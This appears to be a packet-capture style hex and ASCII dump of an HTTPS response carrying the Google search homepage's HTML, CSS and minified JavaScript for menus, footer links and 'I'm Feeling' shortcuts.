                                                                                                                                                                      2021-09-14 14:03:24 UTC101INData Raw: 73 70 61 6e 20 63 6c 61 73 73 3d 22 6b 74 4c 4b 69 22 3e 43 61 72 62 6f 6e 20 6e 65 75 74 72 61 6c 20 73 69 6e 63 65 20 32 30 30 37 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 78 77 50 47 63 20 69 54 6a 78 6b 66 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 48 69 4f 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 69 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 72 69 76 61 63 79 3f 68 6c 3d 65 6e 2d 47 42 26 61 6d 70 3b 66 67 3d 31 22 20 6f 6e 6d 6f 75 73 65 64 6f 77 6e 3d 22 72 65 74 75 72 6e 20 72 77 74 28 74 68 69 73 2c 27 27 2c 27 27 2c 27 27 2c 27 27 2c 27 41 4f 76 56 61 77 31 66 33 6f 2d 33 69 67 46 77 46 75 72 68 6e 6d 77 49 76 45 30 33 27 2c 27 27 2c 27 30 61 68 55 4b 45 77 69 4e 73 61 4c 63
                                                                                                                                                                      Data Ascii: span class="ktLKi">Carbon neutral since 2007</span></a></div><div class="KxwPGc iTjxkf"><a class="pHiOh" href="https://policies.google.com/privacy?hl=en-GB&amp;fg=1" onmousedown="return rwt(this,'','','','','AOvVaw1f3o-3igFwFurhnmwIvE03','','0ahUKEwiNsaLc
                                                                                                                                                                      2021-09-14 14:03:24 UTC103INData Raw: 70 6e 66 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 20 6a 73 61 63 74 69 6f 6e 3d 22 6b 65 79 64 6f 77 6e 3a 4f 45 58 43 33 63 3b 66 6f 63 75 73 6f 75 74 3a 59 34 38 70 56 62 22 3e 3c 6c 69 20 72 6f 6c 65 3d 22 6e 6f 6e 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 45 7a 56 52 71 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 65 6e 2d 47 42 26 61 6d 70 3b 66 67 3d 31 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 69 74 65 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 53 65 61 72 63 68 20 73 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 72 6f 6c 65 3d 22 6e 6f 6e 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 45 7a 56 52 71 22 20 68 72 65 66 3d 22 2f 61 64 76 61 6e 63 65 64 5f
                                                                                                                                                                      Data Ascii: pnf" role="menu" jsaction="keydown:OEXC3c;focusout:Y48pVb"><li role="none"><a class="EzVRq" href="https://www.google.com/preferences?hl=en-GB&amp;fg=1" role="menuitem" tabindex="-1">Search settings</a></li><li role="none"><a class="EzVRq" href="/advanced_
                                                                                                                                                                      2021-09-14 14:03:24 UTC104INData Raw: 6f 70 3a 34 70 78 7d 2e 74 46 59 6a 5a 65 3a 68 6f 76 65 72 20 2e 69 4f 48 4e 4c 62 2c 2e 74 46 59 6a 5a 65 3a 66 6f 63 75 73 20 2e 69 4f 48 4e 4c 62 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 69 4f 48 4e 4c 62 7b 63 6f 6c 6f 72 3a 23 37 30 37 35 37 61 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 30 3b 77 69 64 74 68 3a 32 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 6a 73 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 66 58 4f 30 78 65 22 20 63 6c 61 73 73 3d 22 74 46 59 6a 5a 65 22 20 64 61 74 61 2d 62 73 64 6d 3d 22 30 22 20 64 61 74 61 2d 62 74 66 3d 22 30 22 20 64 61 74 61 2d 68 62 63 3d 22 23 31 61 37 33 65 38 22 20 64 61 74 61 2d 68 74 63 3d 22 23 66 66 66 22 20 64 61 74 61 2d 73 70 74 3d 22 31
                                                                                                                                                                      Data Ascii: op:4px}.tFYjZe:hover .iOHNLb,.tFYjZe:focus .iOHNLb{opacity:1}.iOHNLb{color:#70757a;height:20px;margin-top:-2px;opacity:0;width:20px}</style><div jscontroller="fXO0xe" class="tFYjZe" data-bsdm="0" data-btf="0" data-hbc="#1a73e8" data-htc="#fff" data-spt="1
                                                                                                                                                                      2021-09-14 14:03:24 UTC105INData Raw: 30 2e 33 39 2c 30 2e 33 39 2c 31 2e 30 33 2c 30 2e 33 39 2c 31 2e 34 31 2c 30 63 30 2e 33 39 2d 30 2e 33 39 2c 30 2e 33 39 2d 31 2e 30 33 2c 30 2d 31 2e 34 31 4c 31 38 2e 33 36 2c 31 36 2e 39 35 7a 20 4d 31 39 2e 34 32 2c 35 2e 39 39 63 30 2e 33 39 2d 30 2e 33 39 2c 30 2e 33 39 2d 31 2e 30 33 2c 30 2d 31 2e 34 31 20 63 2d 30 2e 33 39 2d 30 2e 33 39 2d 31 2e 30 33 2d 30 2e 33 39 2d 31 2e 34 31 2c 30 6c 2d 31 2e 30 36 2c 31 2e 30 36 63 2d 30 2e 33 39 2c 30 2e 33 39 2d 30 2e 33 39 2c 31 2e 30 33 2c 30 2c 31 2e 34 31 73 31 2e 30 33 2c 30 2e 33 39 2c 31 2e 34 31 2c 30 4c 31 39 2e 34 32 2c 35 2e 39 39 7a 20 4d 37 2e 30 35 2c 31 38 2e 33 36 20 63 30 2e 33 39 2d 30 2e 33 39 2c 30 2e 33 39 2d 31 2e 30 33 2c 30 2d 31 2e 34 31 63 2d 30 2e 33 39 2d 30 2e 33 39 2d 31
                                                                                                                                                                      Data Ascii: 0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41 c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36 c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1
                                                                                                                                                                      Data Ascii: (){return a.focus()},500)}var Ja=function(a,b){b.stopPropagation();b.preventDefault();N(a.i,{j:3});if(b.target instanceof Element&&(a=b.target.getAttribute("data-hl"))){b=encodeURIComponent("hl");a=encodeURIComponent(a);for(var c=document.location.search
                                                                                                                                                                      2021-09-14 14:03:24 UTC141INData Raw: 7c 28 62 3d 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 22 29 2c 62 3d 6e 65 77 20 76 28 62 2c 74 29 29 2c 61 2e 68 72 65 66 3d 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 76 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 76 3f 62 2e 67 3a 22 74 79 70 65 5f 65 72 72 6f 72 3a 53 61 66 65 55 72 6c 22 29 7d 2c 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6e 75 6c 6c 3d 3d 62 7c 7c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 61 2e 69 26 26 61 2e 73 26 26 21 61 2e 76 26 26 28 61 2e 69 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 62 6c 6f 63 6b 22 2c 61 2e 76 3d 21 30 2c 61 2e 4c 26 26 49 61 28 61 2e 69 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 6c 69 22 29 29 2c 61 2e 73 2e 73 65 74 41 74 74 72 69 62
                                                                                                                                                                      Data Ascii: |(b="about:invalid#zClosurez"),b=new v(b,t)),a.href=b instanceof v&&b.constructor===v?b.g:"type_error:SafeUrl")},Ma=function(a,b){null==b||b.stopPropagation();a.i&&a.s&&!a.v&&(a.i.style.display="block",a.v=!0,a.L&&Ia(a.i.querySelector("li")),a.s.setAttrib
                                                                                                                                                                      2021-09-14 14:03:24 UTC142INData Raw: 6e 67 28 64 29 29 3b 64 26 26 28 64 3d 21 30 2c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29 26 26 28 64 3d 64 2e 6a 6f 69 6e 28 22 20 22 29 29 2c 22 22 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 64 3f 28 52 7c 7c 28 52 3d 7b 61 74 6f 6d 69 63 3a 21 31 2c 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3a 22 6e 6f 6e 65 22 2c 64 72 6f 70 65 66 66 65 63 74 3a 22 6e 6f 6e 65 22 2c 68 61 73 70 6f 70 75 70 3a 21 31 2c 6c 69 76 65 3a 22 6f 66 66 22 2c 6d 75 6c 74 69 6c 69 6e 65 3a 21 31 2c 6d 75 6c 74 69 73 65 6c 65 63 74 61 62 6c 65 3a 21 31 2c 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 22 76 65 72 74 69 63 61 6c 22 2c 72 65 61 64 6f 6e 6c 79 3a 21 31 2c 72 65 6c 65 76 61 6e 74 3a 22 61 64 64 69 74 69 6f 6e 73 20 74 65 78 74 22 2c 72 65 71 75 69 72 65 64 3a 21 31 2c 73 6f 72
                                                                                                                                                                      Data Ascii: ng(d));d&&(d=!0,Array.isArray(d)&&(d=d.join(" ")),""===d||void 0==d?(R||(R={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sor
                                                                                                                                                                      2021-09-14 14:03:24 UTC143INData Raw: 72 6e 20 57 28 62 2c 61 2e 44 2c 63 55 29 7d 2c 61 2e 44 2e 6f 6e 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 55 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 28 62 2c 61 2e 44 2c 63 55 29 7d 29 7d 29 3b 61 2e 73 26 26 28 61 2e 73 2e 6f 6e 63 6c 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 4d 61 28 61 2c 62 29 7d 2c 61 2e 73 2e 6f 6e 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 55 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 61 28 61 2c 62 29 7d 29 7d 29 3b 61 2e 69 26 26 0a 28 61 2e 69 2e 6f 6e 63 6c 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 4a 61 28 61 2c 62 29 7d 2c 61 2e 69 2e
                                                                                                                                                                      Data Ascii: rn W(b,a.D,cU)},a.D.onkeydown=function(b){return U(a,b,function(){return W(b,a.D,cU)})});a.s&&(a.s.onclick=function(b){return Ma(a,b)},a.s.onkeydown=function(b){return U(a,b,function(){return Ma(a,b)})});a.i&&(a.i.onclick=function(b){return Ja(a,b)},a.i.
                                                                                                                                                                      2021-09-14 14:03:24 UTC145INData Raw: 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 4d 6f 75 73 63 22 29 3b 74 68 69 73 2e 76 3d 21 31 3b 74 68 69 73 2e 6c 3d 30 3b 74 68 69 73 2e 43 3d 74 68 69 73 2e 69 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 6c 69 22 29 3b 74 68 69 73 2e 58 3d 74 68 69 73 2e 43 2e 6c 65 6e 67 74 68 2d 31 3b 74 68 69 73 2e 4f 3d 30 3b 74 68 69 73 2e 57 3d 74 68 69 73 2e 4c 3d 21 31 3b 74 68 69 73 2e 55 3d 21 30 3b 74 68 69 73 2e 4b 3d 21 31 3b 74 68 69 73 2e 41 3d 74 68 69 73 2e 68 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 2c 20 62 75 74 74 6f 6e 22 29 3b 74 68 69 73 2e 54 3d 74 68 69 73 2e 41 2e 6c 65 6e 67 74 68 2d 31 3b 74 68 69 73 2e 42 3d 74 68 69 73 2e 59 3d 21 31 3b 74 68 69 73 2e 50 3d 5b 5d 7d 3b 28 66 75 6e 63 74 69 6f
                                                                                                                                                                      Data Ascii: t.getElementById("uMousc");this.v=!1;this.l=0;this.C=this.i.querySelectorAll("li");this.X=this.C.length-1;this.O=0;this.W=this.L=!1;this.U=!0;this.K=!1;this.A=this.h.querySelectorAll("a, button");this.T=this.A.length-1;this.B=this.Y=!1;this.P=[]};(functio
                                                                                                                                                                      2021-09-14 14:03:24 UTC146INData Raw: 2e 30 0a 2a 2f 0a 5f 2e 53 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 5f 2e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 7c 7c 21 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 61 3d 21 31 2c 62 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 7b 7d 2c 22 70 61 73 73 69 76 65 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 61 3d 21 30 7d 7d 29 3b 74 72 79 7b 5f 2e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 5f 2e 48 61 2c 62 29 2c 5f 2e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 5f 2e 48 61 2c 62 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 20 61 7d 28 29 3b 0a 5f 2e 54
                                                                                                                                                                      Data Ascii: .0*/_.Sd=function(){if(!_.t.addEventListener||!Object.defineProperty)return!1;var a=!1,b=Object.defineProperty({},"passive",{get:function(){a=!0}});try{_.t.addEventListener("test",_.Ha,b),_.t.removeEventListener("test",_.Ha,b)}catch(c){}return a}();_.T
                                                                                                                                                                      2021-09-14 14:03:24 UTC147INData Raw: 6e 65 77 20 47 68 28 5f 2e 46 64 29 3b 5f 2e 67 64 28 22 64 64 22 2c 49 68 29 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 6b 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 62 3d 62 7c 7c 5f 2e 74 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 62 3d 62 5b 61 5b 63 5d 5d 2c 6e 75 6c 6c 3d 3d 62 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 7d 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 6c 6a 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 67 62 5f 4e 61 20 2e
                                                                                                                                                                      Data Ascii: new Gh(_.Fd);_.gd("dd",Ih);}catch(e){_._DumpException(e)}try{_.kj=function(a,b){a=a.split(".");b=b||_.t;for(var c=0;c<a.length;c++)if(b=b[a[c]],null==b)return null;return b};}catch(e){_._DumpException(e)}try{var lj=document.querySelector(".gb_Na .
                                                                                                                                                                      2021-09-14 14:03:24 UTC149INData Raw: 4d 61 74 68 2e 63 65 69 6c 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 3d 4d 61 74 68 2e 63 65 69 6c 28 74 68 69 73 2e 68 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5f 2e 68 2e 66 6c 6f 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 77 69 64 74 68 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 68 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5f 2e 68 2e 72 6f 75 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 77 69 64 74 68 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69
                                                                                                                                                                      Data Ascii: Math.ceil(this.width);this.height=Math.ceil(this.height);return this};_.h.floor=function(){this.width=Math.floor(this.width);this.height=Math.floor(this.height);return this};_.h.round=function(){this.width=Math.round(this.width);this.height=Math.round(thi
                                                                                                                                                                      2021-09-14 14:03:24 UTC150INData Raw: 2c 22 64 61 74 61 2d 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 3d 63 7d 29 7d 3b 65 65 3d 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 22 63 65 6c 6c 50 61 64 64 69 6e 67 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 22 63 65 6c 6c 53 70 61 63 69 6e 67 22 2c 63 6f 6c 73 70 61 6e 3a 22 63 6f 6c 53 70 61 6e 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 22 66 72 61 6d 65 42 6f 72 64 65 72 22 2c 68 65 69 67 68 74 3a 22 68 65 69 67 68 74 22 2c 6d 61 78 6c 65 6e 67 74 68 3a 22 6d 61 78 4c 65 6e 67 74 68 22 2c 6e 6f 6e 63 65 3a 22 6e 6f 6e 63 65 22 2c 72 6f 6c 65 3a 22 72 6f 6c 65 22 2c 72 6f 77 73 70 61 6e 3a 22 72 6f 77 53 70 61 6e 22 2c 74 79 70 65 3a 22 74 79 70 65 22 2c 75 73 65 6d 61 70 3a 22 75 73 65 4d 61 70 22 2c 76 61 6c 69 67
                                                                                                                                                                      Data Ascii: ,"data-")?a.setAttribute(d,c):a[d]=c})};ee={cellpadding:"cellPadding",cellspacing:"cellSpacing",colspan:"colSpan",frameborder:"frameBorder",height:"height",maxlength:"maxLength",nonce:"nonce",role:"role",rowspan:"rowSpan",type:"type",usemap:"useMap",valig
                                                                                                                                                                      2021-09-14 14:03:24 UTC151INData Raw: 29 3b 29 7b 69 66 28 62 28 61 29 29 72 65 74 75 72 6e 20 61 3b 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 64 2b 2b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 71 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 43 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 7d 3b 5f 2e 71 28 5f 2e 71 6a 2c 5f 2e 43 29 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 72 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 72 65 6c 3d 63 3b 2d 31 21 3d 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 73 74 79 6c 65 73 68 65 65 74 22 29 3f 28 61 2e 68 72 65
                                                                                                                                                                      Data Ascii: );){if(b(a))return a;a=a.parentNode;d++}return null};}catch(e){_._DumpException(e)}try{_.qj=function(a){_.C.call(this,a)};_.q(_.qj,_.C);}catch(e){_._DumpException(e)}try{_.rj=function(a,b,c){a.rel=c;-1!=c.toLowerCase().indexOf("stylesheet")?(a.hre
                                                                                                                                                                      2021-09-14 14:03:24 UTC152INData Raw: 7d 7d 2c 41 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 43 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 7d 3b 5f 2e 71 28 41 6a 2c 5f 2e 43 29 3b 0a 76 61 72 20 42 6a 3d 5f 2e 48 28 5f 2e 42 64 2c 41 6a 2c 31 37 29 7c 7c 6e 65 77 20 41 6a 2c 43 6a 2c 7a 6a 3d 28 43 6a 3d 5f 2e 48 28 42 6a 2c 5f 2e 71 6a 2c 31 29 29 3f 5f 2e 64 62 28 5f 2e 45 28 43 6a 2c 34 29 7c 7c 22 22 29 3a 6e 75 6c 6c 2c 44 6a 2c 45 6a 3d 28 44 6a 3d 5f 2e 48 28 42 6a 2c 5f 2e 71 6a 2c 32 29 29 3f 5f 2e 64 62 28 5f 2e 45 28 44 6a 2c 34 29 7c 7c 22 22 29 3a 6e 75 6c 6c 2c 46 6a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 78 6a 28 31 2c 32 29 3b 69 66 28 45 6a 29 7b 76 61 72 20 61 3d 5f 2e 6a 65 28 22 4c 49 4e 4b 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 74 65
                                                                                                                                                                      Data Ascii: }},Aj=function(a){_.C.call(this,a)};_.q(Aj,_.C);var Bj=_.H(_.Bd,Aj,17)||new Aj,Cj,zj=(Cj=_.H(Bj,_.qj,1))?_.db(_.E(Cj,4)||""):null,Dj,Ej=(Dj=_.H(Bj,_.qj,2))?_.db(_.E(Dj,4)||""):null,Fj=function(){xj(1,2);if(Ej){var a=_.je("LINK");a.setAttribute("type","te
                                                                                                                                                                      2021-09-14 14:03:24 UTC154INData Raw: 2c 73 69 66 3a 74 72 75 65 2c 73 6e 65 74 3a 74 72 75 65 2c 73 74 72 74 3a 30 2c 75 62 6d 3a 66 61 6c 73 65 2c 75 77 70 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 6d 63 3d 27 7b 5c 78 32 32 61 61 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 61 62 64 5c 78 32 32 3a 7b 5c 78 32 32 61 62 64 5c 78 32 32 3a 66 61 6c 73 65 2c 5c 78 32 32 64 65 62 5c 78 32 32 3a 66 61 6c 73 65 2c 5c 78 32 32 64 65 74 5c 78 32 32 3a 66 61 6c 73 65 7d 2c 5c 78 32 32 61 73 79 6e 63 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 63 64 6f 73 5c 78 32 32 3a 7b 5c 78 32 32 63 64 6f 62 73 65 6c 5c 78 32 32 3a 66 61 6c 73 65 7d 2c 5c 78 32 32 63 72 5c 78 32 32 3a 7b 5c 78 32 32 71 69 72 5c 78 32 32 3a 66 61 6c 73 65 2c 5c 78 32 32 72 63 74 6a 5c 78 32 32 3a 74 72
                                                                                                                                                                      Data Ascii: ,sif:true,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22aa\x22:{},\x22abd\x22:{\x22abd\x22:false,\x22deb\x22:false,\x22det\x22:false},\x22async\x22:{},\x22cdos\x22:{\x22cdobsel\x22:false},\x22cr\x22:{\x22qir\x22:false,\x22rctj\x22:tr
                                                                                                                                                                      2021-09-14 14:03:24 UTC155INData Raw: 5c 78 33 64 72 65 73 74 61 75 72 61 6e 74 73 2b 6e 65 61 72 62 79 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 68 75 6e 67 72 79 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 48 75 6e 67 72 79 5c 78 32 32 7d 2c 7b 5c 78 32 32 68 72 65 66 5c 78 32 32 3a 5c 78 32 32 2f 73 65 61 72 63 68 3f 67 77 73 5f 72 64 5c 78 33 64 73 73 6c 5c 5c 75 30 30 32 36 71 5c 78 33 64 66 6c 69 70 2b 61 2b 63 6f 69 6e 5c 5c 75 30 30 32 36 63 73 66 5c 78 33 64 62 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 61 64 76 65 6e 74 75 72 6f 75 73 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 41 64 76 65 6e 74 75 72 6f 75 73 5c 78 32 32
                                                                                                                                                                      Data Ascii: \x3drestaurants+nearby\x22,\x22id\x22:\x22hungry\x22,\x22msg\x22:\x22I\x27m Feeling Hungry\x22},{\x22href\x22:\x22/search?gws_rd\x3dssl\\u0026q\x3dflip+a+coin\\u0026csf\x3db\x22,\x22id\x22:\x22adventurous\x22,\x22msg\x22:\x22I\x27m Feeling Adventurous\x22
                                                                                                                                                                      2021-09-14 14:03:24 UTC156INData Raw: 77 30 68 58 67 7a 44 4d 54 78 36 36 75 6e 5a 61 4e 38 41 4e 4a 48 41 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 74 72 65 6e 64 79 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 54 72 65 6e 64 79 5c 78 32 32 7d 2c 7b 5c 78 32 32 68 72 65 66 5c 78 32 32 3a 5c 78 32 32 2f 75 72 6c 3f 75 72 6c 5c 78 33 64 68 74 74 70 73 3a 2f 2f 61 72 74 73 61 6e 64 63 75 6c 74 75 72 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 61 72 74 6e 65 72 2f 6d 75 73 65 6f 2d 72 65 69 6e 61 2d 73 6f 66 69 61 5c 5c 75 30 30 32 36 73 61 5c 78 33 64 74 5c 5c 75 30 30 32 36 75 73 67 5c 78 33 64 41 4f 76 56 61 77 33 53 39 58 70 41 65 49 4c 6e 51 7a 5a 54 63 63 70 31 62 41 50 6c 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78
                                                                                                                                                                      Data Ascii: w0hXgzDMTx66unZaN8ANJHA\x22,\x22id\x22:\x22trendy\x22,\x22msg\x22:\x22I\x27m Feeling Trendy\x22},{\x22href\x22:\x22/url?url\x3dhttps://artsandculture.google.com/partner/museo-reina-sofia\\u0026sa\x3dt\\u0026usg\x3dAOvVaw3S9XpAeILnQzZTccp1bAPl\x22,\x22id\x
                                                                                                                                                                      2021-09-14 14:03:24 UTC157INData Raw: 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 31 2c 31 2c 30 2c 6e 75 6c 6c 2c 5c 78 32 32 5c 78 32 32 2c 30 5d 27 5d 3b 0a 76 61 72 20 61 3d 6d 3b 77 69 6e 64 6f 77 2e 57 5f 6a 64 3d 77 69 6e 64 6f 77 2e 57 5f 6a 64 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 3d 32 29 77 69 6e 64 6f 77 2e 57 5f 6a 64 5b 61 5b 62 5d 5d 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 61 5b 62 2b 31 5d 29 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 3d 7b 22 53 30 36 47 72 62 22 3a 22 22 2c 22 7a 43 68 4a 6f 64 22 3a 22 25 2e 40 2e 5d 22 2c 22 53 4e 6c 4d 30 65 22 3a 22 22 2c 22 77 32 62 74 41 65 22 3a 22 25 2e 40 2e 5c 22 5c 22 2c
                                                                                                                                                                      Data Ascii: null,null,null,null,0,null,1,1,0,null,\x22\x22,0]'];var a=m;window.W_jd=window.W_jd||{};for(var b=0;b<a.length;b+=2)window.W_jd[a[b]]=JSON.parse(a[b+1]);})();(function(){window.WIZ_global_data={"S06Grb":"","zChJod":"%.@.]","SNlM0e":"","w2btAe":"%.@.\"\",
